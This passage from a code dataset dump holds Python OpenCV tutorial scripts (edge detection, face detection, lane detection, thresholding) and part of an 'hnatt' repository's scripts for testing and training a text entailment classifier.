numpy.core.fromnumeric import size\r\n\r\nimg1= np.zeros((250,500,3),np.uint8)\r\nimg1= cv2.rectangle(img1,(200,0),(300,100),(255,255,255),-1)\r\nimg2= np.zeros((250,500,3),np.uint8)\r\nimg2= cv2.rectangle(img2,(250,0),(500,500),(255,255,255),-1)\r\n\r\nbitAnd= cv2.bitwise_and(img1,img2)\r\nbitOr= cv2.bitwise_or(img1,img2)\r\nbitXOr= cv2.bitwise_xor(img1,img2)\r\nbitNot= cv2.bitwise_not(img1)\r\n\r\ncv2.imshow('image1',img1)\r\ncv2.imshow('image2',img2)\r\ncv2.imshow('bitAnd',bitAnd)\r\ncv2.imshow('bitOr',bitOr)\r\ncv2.imshow('bitXOr',bitXOr)\r\ncv2.imshow('bitNot',bitNot)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6793540716171265, "alphanum_fraction": 0.7035755515098572, "avg_line_length": 27.965517044067383, "blob_id": "438f9b5ddc40a254e329d34cc4e889905180ad11", "content_id": "44bc85e04b3cb5ae612b59652e165feebdc8ec28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 867, "license_type": "no_license", "max_line_length": 112, "num_lines": 29, "path": "/Canny Edge Detection.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "#Canny Edge Detection Algorithm is composed of 5 Steps.\r\n#(i) Apply Gaussian Filter to smooth the Image in order to remove the Noise.\r\n#(ii) Find the Intensity Gradient of the Image.\r\n#(iii) Apply Non-Maximum Suppression to get rid of spurious response to Edge Detection.\r\n#(iv) Apply Double Threshold to determine potential Edges.\r\n#(v) Track Edges by Hysteresis i.e. finalize the detection of the Edges by suppressing all the other weak Edges. \r\n\r\nimport numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg= cv2.imread('messi5.jpg',0)\r\n\r\ncanny= cv2.Canny(image=img, threshold1=100, threshold2=200)\r\n\r\ntitles= ['image', 'Canny']\r\nimages= [img, canny]\r\n\r\nfor i in range(2):\r\n plt.subplot(1,2,i+1) \r\n plt.imshow(images[i],'gray')\r\n plt.title(titles[i])\r\n plt.xticks([])\r\n plt.yticks([])\r\n\r\nplt.show()\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6201550364494324, "alphanum_fraction": 0.6451334953308105, "avg_line_length": 34.34375, "blob_id": "9eb33e90362f7fe7207356ce71372630ee27b03f", "content_id": "63f5a073757391f45d622102cd4326a9d917d313", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1161, "license_type": "no_license", "max_line_length": 109, "num_lines": 32, "path": "/Face and Eye Detection using Haar Cascade Classifiers.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\n\r\n#Define the classifier\r\nface_cascade= cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\neye_cascade= cv2.CascadeClassifier('haarcascade_eye_tree_eyeglasses.xml')\r\n\r\ncap= cv2.VideoCapture(0)\r\n\r\nwhile cap.isOpened():\r\n _, img= cap.read()\r\n\r\n gray= cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) #CascadeClassifier works only with gray scale images\r\n\r\n #Detect faces inside the image\r\n faces= face_cascade.detectMultiScale(image=gray, scaleFactor=1.1, minNeighbors=4)\r\n #scaleFactor= Parameter specifying how much the image size is reduced at each image scale.\r\n #minNeighbors= Parameter specifying how many neighbors each candidate rectangle should have to retain it.\r\n\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(img, (x, y), (x+w, y+h), (255,0,0), 3)\r\n RoI_gray= gray[y:y+h, x:x+w]\r\n RoI_color= img[y:y+h, x:x+w] \r\n eyes= 
eye_cascade.detectMultiScale(RoI_gray)\r\n for (ex, ey, ew, eh) in eyes: \r\n cv2.rectangle(RoI_color, (ex, ey), (ex+ew, ey+eh), (0,255,0), 3)\r\n\r\n cv2.imshow('img',img)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\ncap.release()" }, { "alpha_fraction": 0.5165496468544006, "alphanum_fraction": 0.5616850256919861, "avg_line_length": 27.382352828979492, "blob_id": "54de8ab2b0b25614df244988713cd4ed81c1e3ae", "content_id": "4bfb6a8f73a836b928829035d398b1a522e711b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 997, "license_type": "no_license", "max_line_length": 73, "num_lines": 34, "path": "/Mouse Events 1.0.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\n\r\n#Mouse events available in OpenCV:\r\n#events= [i for i in dir(cv2) if 'EVENT' in i]\r\n#print(events)\r\n\r\ndef click_event(event, x, y, flags, param):\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n print(x, ', ', y)\r\n font= cv2.FONT_HERSHEY_COMPLEX\r\n line= cv2.LINE_AA\r\n strXY= str(x) + ', ' + str(y) \r\n cv2.putText(img, strXY, (x, y), font, 0.5, (255,25,12), 1, line)\r\n cv2.imshow('image',img)\r\n \r\n if event == cv2.EVENT_RBUTTONDBLCLK:\r\n blue= img[y,x,0]\r\n green= img[y,x,1]\r\n red= img[y,x,2]\r\n font= cv2.FONT_HERSHEY_COMPLEX\r\n line= cv2.LINE_AA\r\n strBGR= str(blue)+ ', '+ str(green)+ ', '+ str(red)\r\n cv2.putText(img, strBGR, (x, y), font, 0.5, (0,255,220), 1, line)\r\n cv2.imshow('image',img)\r\n\r\nimg= cv2.imread('lena.jpg',1)\r\ncv2.imshow('image',img)\r\n\r\ncv2.setMouseCallback('image', click_event)\r\n\r\ncv2.waitKey(0)\r\ncv2.imwrite('lena_mouse_events_1.0.jpg',img)\r\n\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.629199743270874, "alphanum_fraction": 0.6756261587142944, "avg_line_length": 29.519229888916016, "blob_id": "0a2ec6f7a549409bf482cff81e1c97e0945ee1c5", "content_id": "745d9fde2195d96a052b506df15e32a86597f99c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1637, "license_type": "no_license", "max_line_length": 115, "num_lines": 52, "path": "/Road Lane Line Detection.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nfrom numpy.core.fromnumeric import shape\r\n\r\nimg= cv2.imread('road.jpg')\r\nimg= cv2.cvtColor(src=img, code=cv2.COLOR_BGR2RGB)\r\n\r\nprint(img.shape)\r\nheight= img.shape[0]\r\nwidth= img.shape[1]\r\n\r\n#Defining RoI\r\nregion_of_interest_vertices= [\r\n (200,height),\r\n (814, 400),\r\n (width,height)\r\n]\r\n\r\n#Creating a function to mask the region other than RoI\r\ndef region_of_interest(img, vertices):\r\n mask= np.zeros_like(img)\r\n #Fill inside the polygon\r\n cv2.fillPoly(img=mask, pts=vertices, color=255)\r\n #Return the image only where the mask pixel matches\r\n masked_image= cv2.bitwise_and(img, mask)\r\n return masked_image\r\n\r\ngray_img= cv2.cvtColor(src=img, code=cv2.COLOR_BGR2GRAY)\r\ncanny_image= cv2.Canny(image=gray_img, threshold1=100, threshold2=200)\r\n\r\ncropped_image= region_of_interest(canny_image, \r\n np.array(object=[region_of_interest_vertices], dtype=np.int32))\r\n\r\nlines= cv2.HoughLinesP(image=cropped_image, rho=6, theta=np.pi/180, threshold=160, minLineLength=40, maxLineGap=25)\r\n\r\ndef draw_the_lines(img, lines):\r\n img= np.copy(img)\r\n blank_img= np.zeros(shape=(img.shape[0], img.shape[1], 3), dtype=np.uint8)\r\n \r\n for line in 
lines:\r\n for x1, y1, x2, y2 in line:\r\n cv2.line(img=blank_img, pt1=(x1, y1), pt2=(x2, y2), color=(0,255,0), thickness=3)\r\n \r\n #Merge the image with the lines into the original image\r\n img= cv2.addWeighted(src1=img, alpha=0.8, src2=blank_img, beta=1, gamma=0.0)\r\n return img\r\n\r\nimage_with_lines= draw_the_lines(img, lines)\r\n\r\nplt.imshow(image_with_lines)\r\nplt.show()" }, { "alpha_fraction": 0.664545476436615, "alphanum_fraction": 0.7345454692840576, "avg_line_length": 36, "blob_id": "d47bfe16cb53da0c1d4843faa7b38c1727890628", "content_id": "4fb20807d7a6d7ad92000fe4b7df4dfd7ba603b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1100, "license_type": "no_license", "max_line_length": 86, "num_lines": 29, "path": "/Simple Image Thresholding.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\nimg= cv2.imread('gradient.png')\r\n_, th1= cv2.threshold(src=img,thresh=127,maxval=255,type=cv2.THRESH_BINARY)\r\n#Pixel Values <thres will be 0.\r\n\r\n_, th2= cv2.threshold(src=img,thresh=127,maxval=255,type=cv2.THRESH_BINARY_INV)\r\n#Inverse of cv2.THRESH_BINARY, in which Pixel Values >thres will be 0.\r\n\r\n_, th3= cv2.threshold(src=img,thresh=127,maxval=255,type=cv2.THRESH_TRUNC)\r\n#In cv2.THRESH_TRUNC the output pixels >thres remain at the thres value after thresholding.\r\n#i.e. if thres=127 then the pixel value >127 will be 127.\r\n\r\n_, th4= cv2.threshold(src=img,thresh=127,maxval=255,type=cv2.THRESH_TOZERO)\r\n#In cv2.THRESH_TOZERO the pixel values <thres will be zero after thresholding. \r\n\r\n_, th5= cv2.threshold(src=img,thresh=127,maxval=255,type=cv2.THRESH_TOZERO_INV)\r\n#cv2.THRESH_TOZERO_INV is the inverse of cv2.THRESH_TOZERO.\r\n\r\ncv2.imshow('Input Image',img)\r\ncv2.imshow('Binary Thres',th1)\r\ncv2.imshow('Inv Binary Thres',th2)\r\ncv2.imshow('Trunc Thres',th3)\r\ncv2.imshow('Thres to Zero',th4)\r\ncv2.imshow('Thres to Zero Inv',th5)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" } ]
33
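The two pyramid files in this repo build each Laplacian level as L_i = G_i - pyrUp(G_{i+1}) and reconstruct with G_i = L_i + pyrUp(G_{i+1}). A minimal standalone sketch of that round trip follows; the random array is a stand-in for any grayscale image, and signed arithmetic is used because Laplacian values can be negative (cv2.subtract would saturate them to 0 in uint8).

import numpy as np
import cv2

img = np.random.randint(0, 256, (256, 256), dtype=np.uint8)  # stand-in image

down = cv2.pyrDown(img)   # G_1: Gaussian blur + 2x downsample
up = cv2.pyrUp(down)      # expand G_1 back to G_0's size

lap = img.astype(np.int16) - up.astype(np.int16)      # L_0 = G_0 - up(G_1)
recon = (lap + up.astype(np.int16)).astype(np.uint8)  # G_0 = L_0 + up(G_1)

print(np.array_equal(recon, img))  # True: the round trip is exact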
Skarpy735/ps-2fa-bypass-bruteforce
https://github.com/Skarpy735/ps-2fa-bypass-bruteforce
84181f34dc62f144f1085f1ab002f11eb4a329c9
5fb084ed97edb12fe0cbaacb9169d34d93d1efb3
33e59ad1d9446ce971afc2d194065ae0a1d1a0b4
refs/heads/main
2023-04-05T23:30:03.988430
2021-04-27T05:13:57
2021-04-27T05:13:57
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.608397364616394, "alphanum_fraction": 0.615532398223877, "avg_line_length": 34.378639221191406, "blob_id": "3b72a87481ff042c9616ac009a552a1b8f161058", "content_id": "311a1bc187317d811458c0ad8ddee1de10c95d1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3644, "license_type": "no_license", "max_line_length": 101, "num_lines": 103, "path": "/solution.py", "repo_name": "Skarpy735/ps-2fa-bypass-bruteforce", "src_encoding": "UTF-8", "text": "import aiohttp\nimport asyncio\nfrom bs4 import BeautifulSoup\nimport time\n\nasync def main():\n # Set up some variables to access the login and 2fa login pages\n site = \"\"\n username = \"\"\n password = \"\"\n\n # A new client session for each attempt for this script\n # Each coroutine appended to the list will attempt at guessing the 2fa code\n\n attempts = []\n for i in range(0, 2001):\n session = aiohttp.ClientSession()\n mfacode = str(i).zfill(4)\n attempts.append(brute(site, session, username, password, mfacode))\n # Gather the functions and kick them off. Print the successful code and success page.\n await asyncio.gather(*attempts)\n\nasync def login_csrf(site, session):\n \"\"\" GET the login page csrf token before we POST\n Args:\n site (str): login to test\n session (aiohttp): web client session\n Returns:\n string: CSRF token \n \"\"\"\n async with session.get(f'https://{site}/login') as resp:\n soup = BeautifulSoup(await resp.text(),'html.parser')\n return soup.find('input', {'name':'csrf'}).get('value')\n\nasync def post_login(site, session, username, password, csrf):\n \"\"\" POST our login creds and return our CSRF token for the 2fa\n Args:\n site (str): login to test\n session (aiohttp): web client session\n username (str): username to log in\n password (str): password to log in\n csrf (str): CSRF token from previous GET\n Returns:\n string: CSRF token \n \"\"\"\n logindata = {\n 'csrf' : csrf,\n 'username' : username,\n 'password' : password\n }\n async with session.post(f'https://{site}/login', data=logindata) as resp:\n soup = BeautifulSoup(await resp.text(),'html.parser')\n return soup.find('input', {'name':'csrf'}).get('value')\n\nasync def post_2fa(site, session, csrf, mfacode):\n \"\"\" POST our login creds and return our CSRF token for the 2fa\n Args:\n site (str): login to test\n session (aiohttp): web client session\n csrf (str): CSRF token from previous GET\n mfacode (str): multi-factor code to submit\n Returns:\n int: response status code \n \"\"\"\n logindata = {\n 'csrf' : csrf,\n 'mfa-code' : mfacode\n }\n async with session.post(f'https://{site}/login2', data=logindata, allow_redirects=False) as resp:\n soup = BeautifulSoup(await resp.text(),'html.parser')\n return resp.status\n\nasync def brute(site, session, username, password, mfacode):\n \"\"\" One attempt at brute forcing 2fa. Prints our result.\n Args:\n site (str): login to test\n session (aiohttp): web client session\n username (str): username to log in\n password (str): password to log in\n mfacode (str): multi-factor code to submit\n \"\"\"\n csrf = await login_csrf(site, session)\n time.sleep(.001) \n csrf = await post_login(site, session, username, password, csrf)\n time.sleep(.001) \n status = await post_2fa(site, session, csrf, mfacode)\n if status == 302:\n print(f'2fa valid with response code {status}')\n print(f'Success! 
mfa-code is: {mfacode}')\n        async with session.get(f'https://{site}/my-account?id=carlos') as resp:\n            soup = BeautifulSoup(await resp.text(),'html.parser')\n            print(soup)\n        # Closing a running event loop from inside a coroutine raises RuntimeError;\n        # close this session and exit the process once a valid code has been found.\n        await session.close()\n        raise SystemExit(0)\n    else:\n        print(f'2fa invalid with response code: {status}')\n    await session.close()\n\n# 'await' is invalid at module level in a plain script; drive the event loop here.\nif __name__ == '__main__':\n    asyncio.run(main())\n" } ]
1
hubwub/reddit-plugin-liveupdate
https://github.com/hubwub/reddit-plugin-liveupdate
3aeaba5f1c5f72f8dcbdbc0d2fd93f5f9ba2a783
2142c7221a00252521374711abf2ce273bd0d212
62c755dcbb0aabe30f2fd2506259d2100bae067e
refs/heads/master
2017-04-28T17:25:08.500012
2014-07-23T23:24:22
2014-07-23T23:24:22
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5955235958099365, "alphanum_fraction": 0.5955235958099365, "avg_line_length": 22.60377311706543, "blob_id": "a1b4940d817674f195295d6949063cfc64ce32e5", "content_id": "246a8ca14cd3d2ac6276f5eb95c0e5adfbfc0bba", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1251, "license_type": "permissive", "max_line_length": 83, "num_lines": 53, "path": "/reddit_liveupdate/public/static/js/liveupdate/event.js", "repo_name": "hubwub/reddit-plugin-liveupdate", "src_encoding": "UTF-8", "text": "!function(r, Backbone, $) {\n 'use strict'\n\n var exports = r.liveupdate.event = {}\n\n exports.LiveUpdateEvent = Backbone.Model.extend({\n defaults: {\n 'socket_state': 'connecting',\n },\n\n url: function() {\n return '/live/' + r.config.liveupdate_event + '/about.json'\n },\n\n parse: function(response) {\n return response.data\n },\n })\n\n exports.LiveUpdateEventView = Backbone.View.extend({\n initialize: function() {\n this.$titleEl = $('#liveupdate-title')\n this.$descriptionEl = $('#liveupdate-description')\n\n this.listenTo(this.model, {\n 'change:title': this.renderTitle,\n 'change:description_html': this.renderDescription,\n })\n },\n\n renderTitle: function() {\n this.$titleEl.text(this.model.get('title'))\n },\n\n renderDescription: function() {\n var description\n\n if (!this.$descriptionEl.length) {\n this.$descriptionEl = $('<section id=\"liveupdate-description\" class=\"md\">')\n }\n\n description = this.model.get('description_html')\n if (!description) {\n this.$descriptionEl.remove()\n return\n }\n\n this.$descriptionEl\n .html(description)\n .prependTo('aside.sidebar')\n },\n })\n}(r, Backbone, jQuery)\n" }, { "alpha_fraction": 0.5518433451652527, "alphanum_fraction": 0.5581797361373901, "avg_line_length": 20.432098388671875, "blob_id": "4236b8a1c6770c3faf56eb87ea1f2ea202054a14", "content_id": "055e6191445053c1c8f649b5a9d62203c4afbd77", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1736, "license_type": "permissive", "max_line_length": 59, "num_lines": 81, "path": "/reddit_liveupdate/scraper.py", "repo_name": "hubwub/reddit-plugin-liveupdate", "src_encoding": "UTF-8", "text": "from pylons import g\n\nfrom r2.lib.hooks import HookRegistrar\nfrom r2.lib.media import Scraper, MediaEmbed\nfrom r2.lib.utils import UrlParser\n\n\nhooks = HookRegistrar()\n_EMBED_TEMPLATE = \"\"\"\n<!doctype html>\n<html>\n<head>\n<style>\niframe {{\n border: 1px solid black;\n}}\n</style>\n</head>\n<body>\n<iframe src=\"//{domain}/live/{event_id}/embed\"\n width=\"{width}\" height=\"{height}\">\n</iframe>\n</body>\n</html>\n\"\"\"\n\n\nclass _LiveUpdateScraper(Scraper):\n def __init__(self, event_id):\n self.event_id = event_id\n\n def _make_media_object(self):\n return {\n \"type\": \"liveupdate\",\n \"event_id\": self.event_id,\n }\n\n def scrape(self):\n return (\n None,\n self._make_media_object(),\n self._make_media_object(),\n )\n\n @classmethod\n def media_embed(cls, media_object):\n width = 710\n height = 500\n\n content = _EMBED_TEMPLATE.format(\n event_id=media_object[\"event_id\"],\n domain=g.media_domain,\n width=width,\n height=height,\n )\n\n return MediaEmbed(\n height=height,\n width=width,\n content=content,\n )\n\n\[email protected](\"scraper.factory\")\ndef make_scraper(url):\n parsed = UrlParser(url)\n\n if parsed.is_reddit_url():\n if 
parsed.path.startswith(\"/live/\"):\n try:\n event_id = parsed.path.split(\"/\")[2]\n except IndexError:\n return\n else:\n return _LiveUpdateScraper(event_id)\n\n\[email protected](\"scraper.media_embed\")\ndef make_media_embed(media_object):\n if media_object.get(\"type\") == \"liveupdate\":\n return _LiveUpdateScraper.media_embed(media_object)\n" }, { "alpha_fraction": 0.5622641444206238, "alphanum_fraction": 0.5622641444206238, "avg_line_length": 32.125, "blob_id": "45d2271e66357fcd997db8990d8e057a9c2ae4bb", "content_id": "c622895547d14592883fd26ac2cc2db2dc9f8dca", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 265, "license_type": "permissive", "max_line_length": 87, "num_lines": 8, "path": "/reddit_liveupdate/public/static/js/liveupdate/update.html", "repo_name": "hubwub/reddit-plugin-liveupdate", "src_encoding": "UTF-8", "text": "<time class=\"live-timestamp\" datetime=\"<%- thing.isoDate %>\"></time>\n\n<div class=\"body\">\n <%= thing.body %>\n <% if (typeof(thing.authorName) !== 'null') { %>\n <a href=\"/user/<%- thing.authorName %>\" class=\"author\">/u/<%- thing.authorName %></a>\n <% } %>\n</div>\n" }, { "alpha_fraction": 0.5837724208831787, "alphanum_fraction": 0.5854583978652954, "avg_line_length": 29.811687469482422, "blob_id": "2a9b765d2352d356738308d865aa797e36a5bf62", "content_id": "86f96c1bc9c68c491be360129e5ca23d1d4a8e8b", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4745, "license_type": "permissive", "max_line_length": 82, "num_lines": 154, "path": "/reddit_liveupdate/__init__.py", "repo_name": "hubwub/reddit-plugin-liveupdate", "src_encoding": "UTF-8", "text": "import sys\n\nfrom pylons.i18n import N_\n\nfrom r2.config.routing import not_in_sr\nfrom r2.lib.configparse import ConfigValue\nfrom r2.lib.js import (\n FileSource,\n LocalizedModule,\n LocaleSpecificSource,\n TemplateFileSource,\n PermissionsDataSource,\n)\nfrom r2.lib.plugin import Plugin\n\nfrom reddit_liveupdate.permissions import ContributorPermissionSet\n\n\nclass MomentTranslations(LocaleSpecificSource):\n def get_localized_source(self, lang):\n # TODO: minify this\n source = FileSource(\"lib/moment-langs/%s.js\" % lang)\n if not source.path:\n print >> sys.stderr, \" WARNING: no moment.js support for %r\" % lang\n return \"\"\n return source.get_source()\n\n\nclass LiveUpdate(Plugin):\n needs_static_build = True\n\n errors = {\n \"LIVEUPDATE_NO_INVITE_FOUND\":\n N_(\"there is no pending invite for that thread\"),\n \"LIVEUPDATE_TOO_MANY_INVITES\":\n N_(\"there are too many pending invites outstanding\"),\n \"LIVEUPDATE_ALREADY_CONTRIBUTOR\":\n N_(\"that user is already a contributor\"),\n }\n\n config = {\n ConfigValue.int: [\n \"liveupdate_invite_quota\",\n ],\n\n ConfigValue.str: [\n \"liveupdate_pixel_domain\",\n ],\n }\n\n js = {\n \"liveupdate\": LocalizedModule(\"liveupdate.js\",\n \"lib/page-visibility.js\",\n \"lib/tinycon.js\",\n \"lib/moment.js\",\n \"websocket.js\",\n\n \"liveupdate/init.js\",\n \"liveupdate/activity.js\",\n \"liveupdate/embeds.js\",\n \"liveupdate/event.js\",\n \"liveupdate/favicon.js\",\n \"liveupdate/listings.js\",\n \"liveupdate/notifications.js\",\n \"liveupdate/statusBar.js\",\n \"liveupdate/report.js\",\n\n TemplateFileSource(\"liveupdate/update.html\"),\n TemplateFileSource(\"liveupdate/separator.html\"),\n 
TemplateFileSource(\"liveupdate/edit-button.html\"),\n TemplateFileSource(\"liveupdate/reported.html\"),\n\n PermissionsDataSource({\n \"liveupdate_contributor\": ContributorPermissionSet,\n \"liveupdate_contributor_invite\": ContributorPermissionSet,\n }),\n\n localized_appendices=[\n MomentTranslations(),\n ],\n ),\n }\n\n def add_routes(self, mc):\n mc(\n \"/live\",\n controller=\"liveupdateevents\",\n action=\"home\",\n conditions={\"function\": not_in_sr},\n )\n\n mc(\n \"/live/create\",\n controller=\"liveupdateevents\",\n action=\"create\",\n conditions={\"function\": not_in_sr},\n )\n\n mc(\n \"/live/:filter\",\n action=\"listing\",\n controller=\"liveupdateevents\",\n conditions={\"function\": not_in_sr},\n requirements={\"filter\": \"open|closed|reported\"},\n )\n\n mc(\n \"/api/live/:action\",\n controller=\"liveupdateevents\",\n conditions={\"function\": not_in_sr},\n requirements={\"action\": \"create\"},\n )\n\n mc(\"/live/:event\", controller=\"liveupdate\", action=\"listing\",\n conditions={\"function\": not_in_sr}, is_embed=False)\n\n mc(\"/live/:event/embed\", controller=\"liveupdate\", action=\"listing\",\n conditions={\"function\": not_in_sr}, is_embed=True)\n\n mc(\"/live/:event/pixel\",\n controller=\"liveupdatepixel\", action=\"pixel\",\n conditions={\"function\": not_in_sr})\n\n mc(\"/live/:event/:action\", controller=\"liveupdate\",\n conditions={\"function\": not_in_sr})\n\n mc(\"/api/live/:event/:action\", controller=\"liveupdate\",\n conditions={\"function\": not_in_sr})\n\n mc('/mediaembed/liveupdate/:event/:liveupdate/:embed_index',\n controller=\"liveupdateembed\", action=\"mediaembed\")\n\n def load_controllers(self):\n from reddit_liveupdate.controllers import (\n LiveUpdateController,\n LiveUpdateEventsController,\n LiveUpdatePixelController,\n )\n\n from r2.config.templates import api\n from reddit_liveupdate import pages\n api('liveupdateeventapp', pages.LiveUpdateEventAppJsonTemplate)\n api('liveupdateevent', pages.LiveUpdateEventJsonTemplate)\n api('liveupdatereportedeventrow', pages.LiveUpdateEventJsonTemplate)\n api('liveupdate', pages.LiveUpdateJsonTemplate)\n\n from reddit_liveupdate import scraper\n scraper.hooks.register_all()\n\n def declare_queues(self, queues):\n from r2.config.queues import MessageQueue\n queues.declare({\n \"liveupdate_scraper_q\": MessageQueue(bind_to_self=True),\n })\n" } ]
4
saurabhvyas/hnatt
https://github.com/saurabhvyas/hnatt
5240d566da21da5b7f0fb6e72c4cc3d0e7738f8d
301d45f77639e939d7bc8f1ca945bc098e3e1467
2ca8487d0d690adbdd95faed5bee9401e314d9a4
refs/heads/master
2020-03-26T08:31:01.489807
2018-08-20T07:18:20
2018-08-20T07:18:20
144,706,905
0
0
MIT
2018-08-14T10:45:55
2018-08-14T10:43:35
2018-06-29T21:27:28
null
[ { "alpha_fraction": 0.6078216433525085, "alphanum_fraction": 0.6242690086364746, "avg_line_length": 14.342696189880371, "blob_id": "9fa8c01dfd2b9db40427d99ad3f9f92395e8ffc4", "content_id": "bf837004dfb86247f61556970b1e4a64c8ab7ea3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2736, "license_type": "permissive", "max_line_length": 87, "num_lines": 178, "path": "/test.py", "repo_name": "saurabhvyas/hnatt", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[1]:\n\n\nimport sys\n#from tqdm import tqdm\n\n# In[2]:\n\n\n\"\"\" \narguments :\nfirst argument: location of test csv , format should be x1(premise) , x2(hypo) , target\nsee data folder for example csv\n\nsecond argument: whether to use mode 0 or mode1(prediction each example in testset)\nin mode 0, it will only report test set accuracy\nin mode 1, it will give output for each example in test set\n\n\"\"\"\ntest_set_file=sys.argv[1]\nmode=sys.argv[2]\n\n\n# In[3]:\n\n\n#import util.yelp as yelp\nimport numpy as np\nfrom util.text_util import normalize\n\nfrom hnatt import HNATT\n\n#YELP_DATA_PATH = 'data/yelp-dataset/yelp.csv'\nSAVED_MODEL_DIR = 'saved_models'\nSAVED_MODEL_FILENAME = 'model.h5'\nEMBEDDINGS_PATH = 'saved_models/glove.6B.100d.txt'\n\nimport pandas as pd\n\n\n# In[ ]:\n\n\ntry:\n print('reading ' + test_set_file + ' .. ')\n df_test=pd.read_csv(test_set_file)\nexcept:\n print('couldnot read csv file')\n\n\n# In[ ]:\n\n\nprint('''\nclass labels:\n0 : entails\n2 : contradiction\n1 : neutral\n''')\n\n\n# In[ ]:\n\ndata_classes = [\"entails\", \"neutral\", \"contradiction\"]\ndf_test[\"x1\"] = df_test[\"x1\"] + \" \" + df_test[\"x2\"]\ndf_test['target']=df_test['target'].apply(data_classes.index)\n\nprint(df_test['target'][:5])\n\n\n# In[ ]:\n\n\ndf_test=df_test.dropna()\n\n\n# In[ ]:\n\n\ncol_text = 'x1'\ncol_target = 'target'\n\n\n# In[ ]:\n\n\ny_test = df_test[col_target]\n\n\n# In[ ]:\n\n\ndef to_one_hot(labels, dim=5):\n\tresults = np.zeros((len(labels), dim))\n\tfor i, label in enumerate(labels):\n\t\tresults[i][label - 1] = 1\n\treturn results\n\n\n# In[ ]:\n\n\ndef predict_single(text):\n ntext = normalize(text)\n preds = h.predict([ntext])[0]\n prediction = np.argmax(preds).astype(float)\n return prediction\n\n\n# In[ ]:\n\n\n# load pretrained model\ntry:\n print('loading pretrained model ..')\n h = HNATT()\n h.load_weights(SAVED_MODEL_DIR, SAVED_MODEL_FILENAME)\nexcept:\n print('unable to load pretrained model')\n\n\n# In[ ]:\n\n\nif mode=='0':\n print(df_test['x1'][:5])\n df_test['text_tokens']=df_test['x1'].apply(lambda x: normalize(x))\n\n#df['text_tokens'] = df['x1'].progress_apply(lambda x: normalize(x))\n#train_set['len'] = train_set['text_tokens'].apply(lambda x: len(x))\n\n test_x = np.empty((0,))\n test_y = np.empty((0,))\n\n test_x=df_test['text_tokens']\n#train_y=train_set['']\n\n\n\n test_y = to_one_hot(y_test, dim=3)\n print(h.model.metrics_names)\n # test on test set\n loss_and_metrics = h.test(test_x, test_y, batch_size=64)\n print(loss_and_metrics)\n #print(test_x[0])\n #print(test_y[0])\nelse:\n print('running mode 1 , printing ouput for each test example')\n for row in df_test.itertuples():\n print(row.x1)\n print(predict_single(row.x1))\n \n \n\n\n# In[ ]:\n\n\n\n \n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[4]:\n\n\n\n\n" }, { "alpha_fraction": 0.6294492483139038, "alphanum_fraction": 0.6556763052940369, "avg_line_length": 14.645161628723145, "blob_id": "c6835dd98a71083d84454f1ed927143510d95eeb", "content_id": 
"2eee7a7ea52e4f5de284d823c5faceb48863278d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5338, "license_type": "permissive", "max_line_length": 99, "num_lines": 341, "path": "/train_oursv3.py", "repo_name": "saurabhvyas/hnatt", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[1]:\n\n\nimport util.yelp as yelp\nimport numpy as np\nfrom util.text_util import normalize\n\nfrom hnatt import HNATT\n\n#YELP_DATA_PATH = 'data/yelp-dataset/yelp.csv'\nSAVED_MODEL_DIR = 'saved_models'\nSAVED_MODEL_FILENAME = 'model.h5'\nEMBEDDINGS_PATH = 'saved_models/glove.6B.100d.txt'\n\nimport pandas as pd\n\n\n# In[2]:\n\n\nfrom keras import backend as K\nprint(K.tensorflow_backend._get_available_gpus())\n\n\n# In[3]:\n\n\ndf=pd.read_csv('data/preprocessing/preprocessing_scripts/output/concatenated_train_pandas.csv')\ndf_valid=pd.read_csv('data/preprocessing/preprocessing_scripts/output/concatenated_dev_pandas.csv')\ndf_test=pd.read_csv('data/concatenated_test_pandas.csv')\n\n\n# 